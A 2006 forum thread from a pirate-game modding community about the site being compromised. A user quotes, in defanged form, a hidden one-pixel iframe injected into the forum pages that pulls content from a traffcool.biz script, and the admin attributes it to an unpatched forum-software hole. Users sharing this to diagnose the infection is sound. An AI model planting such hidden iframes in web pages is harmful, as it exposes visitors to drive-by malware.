• New Horizons on Maelstrom
    Maelstrom New Horizons


    Visit our website www.piratehorizons.com to quickly find download links for the newest versions of our New Horizons mods Beyond New Horizons and Maelstrom New Horizons!

What the heck is traffcool.biz?

LarryHookins

LarryHookins

Buccaneer
Staff member
Storm Modder
Shortly after I registered and logged in with my new user name, McAfee went nuts, reporting all sorts of problems with something called Exploit-WMF.

I've been looking at the source code for your web pages and found this at the beginning, before the line you'd usually see at the top. It has been edited so it won't try to execute as HTML.

*p align=right**iframe src="http://traffcool.biz/dl/adv542.php" frameborder=0 width=1 height=1 scrolling=no**/iframe**/p*

If y'all didn't put it there, then your site has been violated. If it's something like a web counter, let us know. I do not know if this is the file that caused the problem, so no one should get alarmed.

Thanks,
Hook
 
I've figured out what the code does. After a few seconds it puts the traffcool site in the back button on your browser, so that if you hit the back button, you're taken to their site. I dont' know what the site does, because it comes up as a 404 error. Right now I've got access to the IP address turned off in McAfee.

Would appreciate someone looking into this soonest.

Thanks.

Hook
 
I had trouble with this all day yesterday .I can't use any of the quick links ,have to go to the forum ,then the sub-forums ,then the posts. Real pain in the neck .Some people say they detected hackware ,but I ran my spyware and virus scans and found nothing. I had similar problems week before last, also on the weekend ,don't know if it's related or coincidense .
 
<!--quoteo(post=148955:date=May 21 2006, 04:40 PM:name=Ravenheart)--><div class='quotetop'>QUOTE(Ravenheart @ May 21 2006, 04:40 PM) [snapback]148955[/snapback]</div><div class='quotemain'><!--quotec-->
Get Firefox and NOD32.
<!--QuoteEnd--></div><!--QuoteEEnd-->

This *might* be useful advice, except the problem is not on my end. I also find I cannot download attachments, even .TXT files, without them becoming corrupted. From THIS SITE ONLY. This means I won't be able to to download the next build... at least from here.

Looks like this site has been compromised.

ADMIN, TAKE NOTE!

Hook
 
Taken care of guys.

IPB reported a security hole and someone exploited it faster than I got to the security patch. Sorry for anyone having issues from it.



William
 
<!--quoteo(post=148982:date=May 23 2006, 12:45 AM:name=William)--><div class='quotetop'>QUOTE(William @ May 23 2006, 12:45 AM) [snapback]148982[/snapback]</div><div class='quotemain'><!--quotec-->
Taken care of guys.

IPB reported a security hole and someone exploited it faster than I got to the security patch. Sorry for anyone having issues from it.
<!--QuoteEnd--></div><!--QuoteEEnd-->

Thanks William! Don't you just hate it when you discover a good site just to have it go down almost immediately? <img src="style_emoticons/<#EMO_DIR#>/biggrin.gif" style="vertical-align:middle" emoid=":D" border="0" alt="biggrin.gif" />

Hook
 
<!--coloro:#FF0000--><span style="color:#FF0000"><!--/coloro--><!--sizeo:3--><span style="font-size:12pt;line-height:100%"><!--/sizeo--><b>Very important note:</b><!--sizec--></span><!--/sizec--><!--colorc--></span><!--/colorc-->
Although the forum seems to be working properly again now, the main site piratesahoy.net is still infected with a virus, so DON'T GO THERE! I hope one of the webmasters can fix the main site as well.
 
See de following tew easily block the malicious code... <img src="style_emoticons/<#EMO_DIR#>/icon_mrgreen1.gif" style="vertical-align:middle" emoid=":cheeky" border="0" alt="icon_mrgreen1.gif" />

<a href="http://forum.piratesahoy.net/index.php?s=&showtopic=7358&view=findpost&p=148966" target="_blank">http://forum.piratesahoy.net/index.php?s=&...ndpost&p=148966</a>
 
You must log in or register to reply here.
Back
Top